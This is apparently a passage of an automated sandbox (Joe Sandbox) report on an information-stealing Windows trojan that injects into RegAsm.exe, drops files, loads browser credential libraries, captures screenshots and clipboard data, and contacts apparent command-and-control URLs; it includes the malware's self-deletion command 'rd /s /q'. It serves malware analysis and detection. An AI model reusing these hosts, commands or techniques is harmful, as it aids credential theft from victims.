                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/#
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api#
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/apij
                          Source: RegAsm.exe, 0000000A.00000002.2868690802.0000000000BAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store:443/apifiles/76561199724331900537.36
                          Source: RegAsm.exe, 00000003.00000002.2803671443.00000000012A3000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2801902141.000000000046B000.00000040.00000400.00020000.00000000.sdmp, 76561199780418869[1].htm.3.drString found in binary or memory: https://help.steampowered.com/en/
                          Source: BAKEBA.3.drString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                          Source: RegAsm.exe, 00000003.00000002.2815544613.0000000020883000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2818900138.00000000267FC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr, nss3.dll.3.dr, mozglue.dll.3.dr, freebl3.dll.3.drString found in binary or memory: https://mozilla.org0/
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_00438660 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 10_2_00438660
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00411F55 CreateStreamOnHGlobal,GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,GetHGlobalFromStream,GlobalLock,GlobalSize,SelectObject,DeleteObject,DeleteObject,ReleaseDC,CloseWindow, 3_2_00411F55

                          System Summary

                          Source: file.exe, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 393216
                          Source: ECBKKKFHCF.exe.3.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 360448
                          Source: 66fe13d251bbf_lsod[1].exe.3.dr, MoveAngles.cs Large array initialization: MoveAngles: array initializer size 360448
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_0040145B GetCurrentProcess,NtQueryInformationProcess, 3_2_0040145B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C66B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C66B700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C66B8C0 rand_s,NtQueryVirtualMemory, 3_2_6C66B8C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C66B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 3_2_6C66B910
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C60F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 3_2_6C60F280
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6BEFB03_2_6C6BEFB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7848403_2_6C784840
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7008203_2_6C700820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73A8203_2_6C73A820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B68E03_2_6C7B68E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E89603_2_6C6E8960
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7069003_2_6C706900
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7CC9E03_2_6C7CC9E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6E49F03_2_6C6E49F0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7709B03_2_6C7709B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7409A03_2_6C7409A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C76A9A03_2_6C76A9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72CA703_2_6C72CA70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C768A303_2_6C768A30
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C75EA003_2_6C75EA00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C72EA803_2_6C72EA80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7B6BE03_2_6C7B6BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C750BA03_2_6C750BA0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C6C84603_2_6C6C8460
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C73A4303_2_6C73A430
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 3_2_6C7144203_2_6C714420
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004101A010_2_004101A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00446DCB10_2_00446DCB
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040100010_2_00401000
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040702010_2_00407020
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0041508C10_2_0041508C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004480A010_2_004480A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004221A010_2_004221A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0044424010_2_00444240
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040B27010_2_0040B270
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040C21010_2_0040C210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043821010_2_00438210
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004432E010_2_004432E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004012F210_2_004012F2
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042D29510_2_0042D295
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040937E10_2_0040937E
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040532010_2_00405320
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004073D010_2_004073D0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040138D10_2_0040138D
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042A3A810_2_0042A3A8
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042847210_2_00428472
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042D4D410_2_0042D4D4
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042C51010_2_0042C510
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004365E010_2_004365E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040158910_2_00401589
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043059010_2_00430590
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043167010_2_00431670
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042C6E110_2_0042C6E1
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_004486E010_2_004486E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040A68010_2_0040A680
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040877010_2_00408770
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040B70010_2_0040B700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040378010_2_00403780
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043682010_2_00436820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042B83010_2_0042B830
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043F8E010_2_0043F8E0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042E92710_2_0042E927
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0042DB4B10_2_0042DB4B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00411B5010_2_00411B50
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040ABD010_2_0040ABD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00448BE010_2_00448BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00447BE010_2_00447BE0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0043EC6010_2_0043EC60
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_00407DD010_2_00407DD0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0041DDFF10_2_0041DDFF
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 10_2_0040CF1010_2_0040CF10
                          Source: Joe Sandbox View Dropped File: C:\ProgramData\ECBKKKFHCF.exe 43DD8FCF131F4B471D17CBBCF8BD7C0E3C9354D9727E8FE4A8CD763029E4D98C
                          Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004047E8 appears 38 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 00410609 appears 71 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C8309D0 appears 82 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040EBD0 appears 171 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C63CBE8 appears 134 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 6C6494D0 appears 90 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 0040CCF0 appears 51 times
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: String function: 004104E7 appears 36 times
                          Source: file.exe Static PE information: invalid certificate
                          Source: file.exe, 00000000.00000002.2142456053.00000000013FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs file.exe
                          Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: file.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: ECBKKKFHCF.exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: 66fe13d251bbf_lsod[1].exe.3.dr Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@15/24@12/12
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_6C667030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,3_2_6C667030
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_004114A5 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,3_2_004114A5
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 3_2_00411807 __EH_prolog3_catch_GS,CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,FileTimeToSystemTime,GetProcessHeap,HeapAlloc,wsprintfA,VariantClear,3_2_00411807
                          Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
                          Source: C:\ProgramData\ECBKKKFHCF.exe Mutant created: NULL
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
                          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5940:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Local\Temp\delays.tmp
                          Source: file.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\Desktop\desktop.ini
                          Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                          Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                          Source: RegAsm.exe, 00000003.00000002.2839813622.000000006C83F000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000003.00000002.2830673397.000000003E5BC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.3.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                          Source: AAAAKJ.3.dr, FCAAEB.3.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
                          Source: RegAsm.exe, 00000003.00000002.2814880324.00000000202F8000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2809583915.000000001A38E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                          Source: RegAsm.exe, 00000003.00000002.2824836690.00000000326DC000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.3.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
                          Source: file.exe Virustotal: Detection: 27%
                          Source: unknown Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\ProgramData\ECBKKKFHCF.exe "C:\ProgramData\ECBKKKFHCF.exe"
                          Source: C:\ProgramData\ECBKKKFHCF.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Source: C:\ProgramData\ECBKKKFHCF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\ProgramData\ECBKKKFHCF.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\IJJKKJJDAAAA" & exit
                          Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
                          Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
